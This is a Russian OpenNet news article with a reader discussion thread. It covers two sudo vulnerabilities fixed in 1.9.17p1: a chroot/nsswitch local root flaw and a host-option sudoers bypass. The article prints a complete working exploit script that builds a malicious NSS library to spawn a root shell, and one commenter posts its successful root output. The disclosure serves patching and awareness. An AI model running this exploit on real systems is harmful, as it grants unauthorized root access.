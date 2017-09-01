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Уязвимости в утилите sudo, позволяющие получить права root в системе

01.07.2025 11:23

В пакете sudo, применяемом для организации выполнения команд от имени других пользователей, выявлена уязвимость (CVE-2025-32463), позволяющая любому непривилегированному пользователю выполнить код с правами root, даже если пользователь не упомянут в конфигурации sudoers. Проблеме подвержены дистрибутивы, использующие файл конфигурации /etc/nsswitch.conf, например, возможность эксплуатации уязвимости продемонстрирована в Ubuntu 24.04 и Fedora 41.

Уязвимость проявляется в конфигурации по умолчанию и подтверждена в выпусках sudo с 1.9.14 по 1.9.17 (потенциально затрагивает все версии, начиная с 1.8.33). Проблема устранена в обновлении sudo 1.9.17p1. Проверить состояние новой версии пакета или подготовки исправления в дистрибутивах можно на следующих страницах (если страница недоступна, значит разработчики дистрибутива ещё не приступили к рассмотрению проблемы): Debian, Ubuntu, Fedora, SUSE/openSUSE, RHEL, Gentoo и Arch (1, 2).

Проблема вызвана тем, что при применении опции "-R" ("--chroot") для запуска команд в chroot-окружении с выбранным пользователем корневым каталогом, файл /etc/nsswitch.conf загружался в контексте нового корневого каталога, а не системного каталога. Так как пользователь может использовать в качестве корневого каталога для chroot собственный каталог, он может разместить в нём файл конфигурации nsswitch.conf. Контролируя загружаемый подсистемой NSS (Name Service Switch) файл /etc/nsswitch.conf, пользователь может добавить в него настройки, приводящие к вызову дополнительных обработчиков. Подобные обработчики загружаются NSS в форме разделяемых библиотек, которые также можно разместить в подконтрольном пользователю каталоге. Подставив свою библиотеку пользователь может добиться выполнения из неё кода с правами root, так как обработка NSS производится до сброса привилегий.

Пример эксплоита: 


#!/bin/bash

STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1

cat > woot1337.c<<EOF
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void woot(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  execl("/bin/bash", "/bin/bash", NULL);
}
EOF

mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c

echo "woot!"
sudo -R woot woot
rm -rf ${STAGE?}

В версии sudo 1.9.17p1 также устранена ещё одна уязвимость (CVE-2025-32462), позволяющая выполнить команды с правами root, но проявляющаяся только в конфигурациях sudoers, параметр "host" в которых выставлен в значение, отличное от ALL или имени текущего хоста. Уязвимость вызвана ошибкой, из-за которой опция "-h" ("--host") действовала не только в сочетании с опцией "-l" ("--list") для вывода привязанных к хосту привилегий, но и при запуске команд. Таким образом пользователь мог указать при вызове sudo любой хост и обойти ограничения правил sudoers, привязанных к имени хоста.

Для совершения атаки пользователь должен упоминаться в sudoers, например, если в настройках указано "testuser testhost = ALL", то пользователь "testuser" мог указать "sudo -h testhost" и запустить команды с правами root на любых хостах, а не только на хосте testhost. Уязвимости не подвержены конфигурации с настройками вида "testuser ALL = ALL" или без явных правил для конкретного пользователя.

  1. Главная ссылка к новости (https://www.openwall.com/lists...)
  2. OpenNews: В Ubuntu 25.10 решено задействовать аналог sudo, написанный на Rust
  3. OpenNews: Уязвимость в sudo, позволяющая изменить любой файл в системе
  4. OpenNews: Леннарт Поттеринг представил run0, замену sudo, интегрированную в systemd
  5. OpenNews: Mayhem - атака, искажающая биты в памяти для обхода аутентификации в sudo и OpenSSH
  6. OpenNews: Использование SSH поверх UNIX-сокета вместо sudo для избавления от suid-файлов
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/63505-sudo
Ключевые слова: sudo
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (47) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Аноним (1), 12:11, 01/07/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –14 +/
    04/01/2025: Vulnerability report sent to Todd Miller (Sudo maintainer).

    07.05.2025 В Ubuntu 25.10 решено задействовать аналог sudo, написанный на Rust https://opennet.ru/63197-ubuntu

    В Ubuntu оказывается неспроста начали менять sudo на  sudo-rs.

     
     
  • 2.3, Аноним (3), 12:13, 01/07/2025 [^] [^^] [^^^] [ответить]  
    		• –9 +/
    В целом логичный шаг после замены дыряшечных coreutils, но да, забавно.
     
  • 2.4, Anon62513512124 (?), 12:15, 01/07/2025 [^] [^^] [^^^] [ответить]  
    		• +21 +/
    Мудро то оно может и да, но похоже что этот вид багов вполне можно и на rust допустить
     
     
  • 3.18, Alexey (??), 12:53, 01/07/2025 [^] [^^] [^^^] [ответить]  
    		• +10 +/
    Да, тут никаких переполнений буфера, use-after-free итп нет, ошибка логическая, никакой язык программирования от этого не спасёт
     
     
  • 4.31, Аноним (31), 13:37, 01/07/2025 [^] [^^] [^^^] [ответить]  
    		• –5 +/
    Сишники выдохнули с облегчением: наконец-то уязвимость, которая не вызвана некорректной работой с памятью! И раст объявляется автоматически плохим, потому что "именно от этой уязвимости бы не спас". Вот такой вот полет сишной мысли.
     
     
  • 5.35, Aliech (ok), 13:50, 01/07/2025 Скрыто ботом-модератором     [к модератору]
    		• +6 +/
     
  • 4.43, Аноним (43), 14:27, 01/07/2025 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Здесь использование юниксового легаси говна nsswitch, есть большая вероятность что в новом софте такая дрянь не будет поддерживаться и проблемы не будет.
     
  • 2.7, IdeaFix (ok), 12:23, 01/07/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    Тут программист не в звездочках заблудился а в слешах. Это пофиксят в NGR (NextGenRust), пока же раст как обычно бессилен. Программист победил.
     
  • 2.12, Аноним (12), 12:37, 01/07/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    А как это поможет если sudo-rs такой же комбайн как sudo?
     
     
  • 3.33, Аноним (33), 13:44, 01/07/2025 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    Но безопасТный комбайн.
     
  • 3.58, нах. (?), 15:56, 01/07/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    Все в порядке, он не такой же.
    Авторы заявляли что конечной их целью является поддержка дефолтного конфига популярных дистрибутивов.

    А там root = (ALL) ALL
    и больше ничего нет.

     
  • 2.14, Аноним (14), 12:46, 01/07/2025 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Одно с другим не связано. Здесь логическая ошибка. Rust никаким образом здесь не помог бы.
     
  • 2.16, Andrey (??), 12:47, 01/07/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    Этот баг вызван не ошибкой в работе с памятью. Тут rust никак не помог бы.
     

  • 1.2, Ананимус (?), 12:12, 01/07/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +7 +/
    Я начинаю видеть некоторую мудрость людей из OpenBSD, породивших doas.
     
     
  • 2.9, IMBird (ok), 12:25, 01/07/2025 [^] [^^] [^^^] [ответить]  
    		• +4 +/
    Да, doas рулит, а для рядовых задач и вовсе хватает su.
     

  • 1.5, Аноним (5), 12:17, 01/07/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +6 +/
    Это настолько феерично, что я никогда в жизни не поверю, что это не закладка.
     
     
  • 2.26, asd (??), 13:12, 01/07/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    Поражает воображение, насколько ВСЁ дырявое..
    Так что согласен про закладки. Иначе, нужно быть полными лохами, чтобы за столько десятилетий не закрыть их все, раз уж пишешь этот софт с умным.
     
  • 2.34, fidoman (ok), 13:46, 01/07/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    Не факт. Это скорее следствие так называемой "bazaar" методологии разработки. Вместо того, чтобы пользоваться системными либами, оно само тупо лезет в этот файл. А поскольку это, как водится, делается "напролом" - вот и косяки прут косяками.
     

  • 1.6, birdie (ok), 12:17, 01/07/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +4 +/
    Уязвимость - жуть.

    Только что проверил полностью пропатченную Fedora 42:

    ./pown.sh
    woot!
    [root@zen /]# id
    uid=0(root) gid=0(root) groups=0(root),39(video),63(audio),1010(testuser) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

    Жаль, нет такой для Android.

     
     
  • 2.10, Аноним (10), 12:29, 01/07/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    Любая админ утилита вообще это шкатулка-разгадайка. Можно напхать туда "ребусов" как такой условный пароль до рут данной утилиты и эксплуатировать для себя.


     
  • 2.17, Аноним (17), 12:50, 01/07/2025 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    >./pown.sh
    >woot!
    >[root@zen /]# id

    Я так понимаю, что root создается внутри чрута woot, в котором (сюрприз!) необходимо иметь права записи и удаления. Т.е. для поднятия привелегий требуется уже иметь их.
    Как обычно очередной академический "сферический конь".

     
     
  • 3.21, User (??), 13:00, 01/07/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    "Но в песне не понял ты, увы, ни...чего"(С)
     
     
  • 4.38, Аноним (17), 13:53, 01/07/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    А если все-таки попробовать включить голову и подумать (с)
     
     
  • 5.45, User (??), 14:44, 01/07/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    "... да и было ли ему чем?"(С)
     
  • 3.53, Аноним (53), 15:21, 01/07/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    chroot - это всё равно, что папку через cd сменить, он рута не изолирует от ресурсов системы от слова совсем. После чрута в пустую папку (только с нужными файликами для взлома жепы), делаете mount -t devfs devfs /dev и получаете доступ ко всем девайсам подключенным к системе.
     

  • 1.8, Аноним (10), 12:25, 01/07/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Сколько не обновляйся все равно пользователя, извиняюсь за выражение, отымеют
     
  • 1.15, Аноним (-), 12:46, 01/07/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –1 +/
    > позволяющая любому непривилегированному пользователю выполнить код с правами root

    Ты должен был бороться со злом, а не примкнуть к нему!..  (c)
    Впрочем ничего нового)
    В ляликсе уже сколько утилит и разных способов, а вот и ныне тем.

     
     
  • 2.24, Аноним (10), 13:06, 01/07/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    Есть примеры, где через подобные "уязвимости" своровали данные/навредили инфраструктуре.

    Не в сферическом вакууме это все не работает. Т.е. в реальном мире никто не будет локально прописывать ребусы, чтобы завладеть своим же серваком))

    Это все уже давно устарело.. а данные копятся уже в облачных хранилищах, где манипуляции с вашими данными никак не зависят. есть ли какой то эксплоит или нет.

    Т.е. те же облачные сервисы это удаленная ОС. А на локальный корень Вашего ПК им абсолютно равнодушно.

     

  • 1.22, Аноним (22), 13:01, 01/07/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +2 +/
    /etc/os-release:VERSION="24.04.2 LTS (Noble Numbat)"
    sudo           1.9.15p5-3ubuntu5.24.04.1 amd64

    ...
    sudo: you are not permitted to use the -R option with woot
    ...

    сп#здели

     
  • 1.27, ё (?), 13:15, 01/07/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Так я не понял, если пользователя упомянуть в sudoers то он и так получает root. А без упоминания sudo, из под этого пользователя, запустить не получится?
     
     
  • 2.30, Владимир (??), 13:31, 01/07/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    Нет. Он может быть упомянут в sudoers для выполнения одной единственной команды, а не для root доступа.
     

  • 1.29, Fracta1L (ok), 13:21, 01/07/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    А в sudo-rs есть такая уязвимость?
     

  • 1.32, Аноним (32), 13:40, 01/07/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    а как там run0 поживает?
     
     
  • 2.40, Аноним (33), 14:15, 01/07/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    Приближается к run1. А дальше синхронизация с нумерацией версий systemd.
     

  • 1.36, Аноним (36), 13:50, 01/07/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Жесть, детская уязвимость которую может эксплойтнуть любой школьник и поставляется со всеми серверами мира. Расчехлили еще один бэкдор красношляпы.
     
  • 1.37, Аноним (-), 13:51, 01/07/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Не первая ошибка, только... никто от sudo не отказался после прошлой ошибки. Как-то не удобно. До сих пор есть множество сценариев и рекомендаций использовать sudo вместо su. И я пока особо не видел где-то сценариев для настройки/установки чего-либо где бы sudo заменили на run0 или sudo-rs. Впрочем алиас никогда не поздно сделать.
     
  • 1.44, Витюшка (?), 14:35, 01/07/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –1 +/
    Да всем по...современный ИТ (любой, на любой ОС, хоть open-source, хоть корпоративный) это дырка на дырке. Нет времени думать, нужно делать фичи.

    Однако есть и нормальные альтернативы - https://github.com/LeChatP/RootAsRole

    RootAsRole. Ой, на Rust 😱😱😱

     
     
  • 2.50, Аноним (50), 15:14, 01/07/2025 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Всего лишь следствие капитализма и корпоративизации отрасли. Изначально айти была академической, но слишком молодой, чтобы выработать лучшие практики. Сейчас же лучшие практики есть, но в угоду kpi и прочей дряни, что на качество кода забивают.
    Иными словами, принцип неопределенности: либо медленно и качественно, либо быстро и плохо.
     
  • 2.52, Аноним (-), 15:16, 01/07/2025 Скрыто ботом-модератором     [к модератору]
    		• +/
     

  • 1.47, Котик Биба (?), 15:03, 01/07/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Ой, а что это такое? Уязвимость в сишной версии sudo. А мы, растовики, можем чем-то помочь?
     
     
  • 2.51, Аноним (-), 15:14, 01/07/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    > Ой, а что это такое? Уязвимость в сишной версии sudo. А мы, растовики, можем чем-то помочь?

    Починить свои CVE, коих уже за три сотни, чтоли, перевалило? :)

     
  • 2.56, er (??), 15:45, 01/07/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    за язык вас никто не тянул, поэтому сходите дворы пометите, хоть какаято польза от вас будет
     

  • 1.48, Аноним (48), 15:06, 01/07/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    На первое время можно бинарник sudo удалить/спрятать.
     
  • 1.49, Аноним (-), 15:14, 01/07/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    > любому непривилегированному пользователю выполнить код с правами root,
    > даже если пользователь не упомянут в конфигурации sudoers

    Ну спасибо убунта, при том это уже не в первый раз. То им sudoedit какой-то спичил - и тоже рута всем раздавал, теперь это.

     
  • 1.54, Омном (?), 15:23, 01/07/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Элегантная дыра
     

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